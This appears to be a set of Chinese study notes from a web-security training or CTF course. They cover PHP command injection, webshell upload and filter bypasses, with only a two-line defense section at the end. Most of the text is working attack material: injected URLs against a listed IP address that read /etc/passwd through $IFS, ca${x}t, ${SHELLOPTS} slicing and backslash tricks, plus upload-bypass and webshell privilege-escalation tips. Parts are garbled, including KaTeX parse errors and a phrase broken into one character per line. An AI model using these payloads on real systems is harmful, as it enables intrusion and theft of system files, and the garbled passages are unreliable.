御剑扫出admin登录后台,出现一个flag
基本信息:有一个flag
上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件
信息泄露包括源码泄露,配置等
命令执行漏洞:(非代码执行)
应用程序源代码功能实现需要执行系统命令的函数,如果命令连接符控制此函数,就能执行系统命令,。 &,| || 都可以作为连接符使用,如果没有对函数过滤,导致在没有绝对路径的情况下被执行。
常见函数:system函数 exec函数 passthru函数 ``反单引号
system (string KaTeX parse error: Expected 'EOF', got '&' at position 15: command [,int &̲return_var])
exec(string KaTeX parse error: Expected 'EOF', got '&' at position 16: command[,array &̲output[,int &return_var]])
passthru(string KaTeX parse error: Expected 'EOF', got '&' at position 14: command[,int &̲])
``(单引号)
主要是widows和linux:
windows:如果我们的服务器是一台Windows操作系统,存在着命令执行漏洞。对Windows服务器系统进行扫描探测、进行进程和服务管理、进行内网渗透、服务器提限等。
写一个php。执行:直接在url上写上参数值。例如ipconfig,netstat,
管道符
|:A|B:a的输出作为b的输入
||:A||B:A执行失败后执行B,类似if else
&&:A&&B:A执行成功执行BB
提权:
上传webshell,大马骑小马,
上传exp,闪电小子等脚本,
linux:
;
&
&&
|
||
判断有没有管理员权限:
使用id:
uid=501,为普通用户。
http://120.78.92.198:8030.练习环境
1:空格绕过:
$IFS函数,分隔符,有空格功能
%09 tab的url编码,也可以代替空格:
{}绕过,将需要空格的命令使用{}括起来:
/**/ 等号为like
绕过主要是服务器
黑名单(改后缀,复写,相近语言也可以执行,比如jsps可以当作jsp。asp可以asps,cer,asa。php可以为php2,php3,php5. 比如apache的城域网组,解析,从右往左,多后缀),
白名单(修改content-type,内存结算,双重识别时伪造真实图片,过滤文件内容时,提前转义/,木马变形,)
2:关键词命令过滤:
变量拼接:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;a=c;b=at;
a
a
ab%20/etc/passwd
绕过cat
通过空变量绕过:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;ca${x}t%20/etc/passwd
cat变为:ca${x}t。 ${x}为空
不会被执行,所以cat被执行。
-<绕过:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;ca${x}t%3C/etc/passwd
%3c即<:
系统变量绕过:
是
系
统
自
动
变
量
,
可
以
利
用
系
统
变
量
的
字
符
拼
接
为
命
令
执
行
h
t
t
p
:
/
/
120.78.92.198
:
8030
/
e
x
e
c
/
03.
p
h
p
?
i
p
=
127.0.0.1
;
是系统自动变量,可以利用系统变量的字符拼接为命令执行 http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;
是系统自动变量,可以利用系统变量的字符拼接为命令执行http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;{SHELLOPTS:3:1}at%20/etc/passwd
反斜杠绕过:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;c\a\t%20/etc/passwd
base64编码绕过:
命令执行漏洞防御:
1:
php配置文件禁用敏感函数 disable functions配置文件
2过滤函数:escapesheeearg函数。